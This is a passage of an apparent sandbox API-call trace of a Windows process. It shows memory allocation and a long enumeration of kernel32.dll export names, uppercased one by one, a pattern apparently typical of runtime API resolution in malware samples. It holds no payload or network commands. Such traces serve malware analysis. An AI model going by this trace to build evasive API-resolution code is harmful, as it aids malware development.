flProtect=0x4) returned 0xfb0000 [0077.453] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0077.453] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0077.453] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0077.454] lstrlenA (lpString="kernel32.dll") returned 12 [0077.454] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0077.454] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0077.454] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0077.454] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0077.454] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0077.454] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0077.454] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0077.454] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0077.454] lstrlenA (lpString="ADDATOMA") returned 8 [0077.454] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0077.454] lstrlenA (lpString="ADDATOMW") returned 8 [0077.454] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0077.454] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0077.454] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0077.454] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0077.454] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0077.454] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0077.454] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0077.454] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0077.454] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0077.454] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0077.454] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0077.454] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0077.454] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0077.454] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0077.455] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0077.455] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0077.455] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0077.455] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0077.455] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0077.455] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0077.455] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0077.455] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0077.455] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0077.455] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0077.455] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0077.455] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0077.455] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0077.455] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0077.455] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0077.455] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0077.455] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0077.455] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0077.455] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0077.455] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0077.455] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0077.455] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0077.455] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0077.455] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0077.455] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0077.455] lstrlenA (lpString="BACKUPREAD") returned 10 [0077.455] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0077.455] lstrlenA (lpString="BACKUPSEEK") returned 10 [0077.455] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0077.455] lstrlenA (lpString="BACKUPWRITE") returned 11 [0077.455] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0077.455] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0077.455] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0077.455] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0077.455] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0077.455] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0077.455] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0077.456] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0077.456] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0077.456] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0077.456] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0077.456] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0077.456] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0077.456] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0077.456] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0077.456] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0077.456] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0077.456] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0077.456] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0077.456] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0077.456] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0077.456] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0077.456] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0077.456] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0077.456] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0077.456] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0077.456] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0077.456] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0077.456] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0077.456] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0077.456] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0077.456] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0077.456] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0077.456] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0077.456] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0077.456] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0077.456] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0077.456] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0077.456] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0077.456] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0077.456] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0077.456] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0077.456] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0077.457] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0077.457] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0077.457] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0077.457] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0077.457] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0077.457] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0077.457] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0077.457] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0077.457] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0077.457] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0077.457] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0077.457] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0077.457] lstrlenA (lpString="BEEP") returned 4 [0077.457] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0077.457] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0077.457] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0077.457] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0077.457] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0077.457] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0077.457] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0077.457] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0077.457] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0077.457] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0077.457] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0077.457] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0077.457] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0077.457] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0077.457] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0077.457] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0077.457] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0077.457] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0077.457] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0077.457] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0077.457] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0077.457] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0077.457] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0077.458] lstrlenA (lpString="CANCELIO") returned 8 [0077.458] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0077.458] lstrlenA (lpString="CANCELIOEX") returned 10 [0077.458] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0077.458] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0077.458] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0077.458] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0077.458] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0077.458] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0077.458] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0077.458] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0077.458] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0077.458] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0077.458] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0077.458] lstrlenA (lpString="CHECKELEVATION") returned 14 [0077.458] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0077.458] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0077.458] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0077.458] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0077.458] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0077.458] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0077.458] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0077.458] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0077.458] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0077.458] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0077.458] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0077.458] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0077.458] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0077.458] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0077.458] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0077.458] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0077.458] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0077.458] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0077.458] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0077.458] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0077.458] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0077.458] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0077.459] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0077.459] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0077.459] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0077.459] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0077.459] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0077.459] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0077.459] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0077.459] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0077.459] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0077.459] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0077.459] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0077.459] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0077.459] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0077.459] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0077.459] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0077.459] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0077.459] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0077.459] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0077.459] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0077.459] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0077.459] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0077.459] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0077.459] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0077.459] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0077.459] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0077.459] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0077.459] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0077.459] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0077.459] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0077.459] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0077.459] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0077.459] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0077.459] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0077.459] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0077.459] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0077.459] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0077.459] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0077.459] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0077.460] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0077.460] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0077.460] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0077.460] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0077.460] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0077.460] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0077.460] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0077.460] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0077.460] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0077.460] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0077.460] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0077.460] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0077.460] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0077.460] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0077.460] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0077.460] lstrlenA (lpString="COPYCONTEXT") returned 11 [0077.460] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0077.460] lstrlenA (lpString="COPYFILEA") returned 9 [0077.460] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0077.460] lstrlenA (lpString="COPYFILEEXA") returned 11 [0077.460] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0077.460] lstrlenA (lpString="COPYFILEEXW") returned 11 [0077.460] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0077.460] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0077.460] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0077.460] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0077.460] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0077.460] lstrlenA (lpString="COPYFILEW") returned 9 [0077.460] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0077.460] lstrlenA (lpString="COPYLZFILE") returned 10 [0077.460] lstrcpyA (in: lpString1=0x3f2c7fc, 